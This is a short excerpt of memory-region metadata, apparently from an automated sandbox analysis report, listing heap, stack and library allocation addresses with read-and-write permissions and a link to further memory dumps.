2AB2DB30000
heap
page read and write
30BD000
heap
page read and write
7C90000
trusted library allocation
page read and write
3278000
stack
page read and write
AD0000
heap
page read and write
7351000
heap
page read and write
4C51000
trusted library allocation
page read and write
2AB2F065000
heap
page read and write
There are 702 hidden memdumps, click here to show them.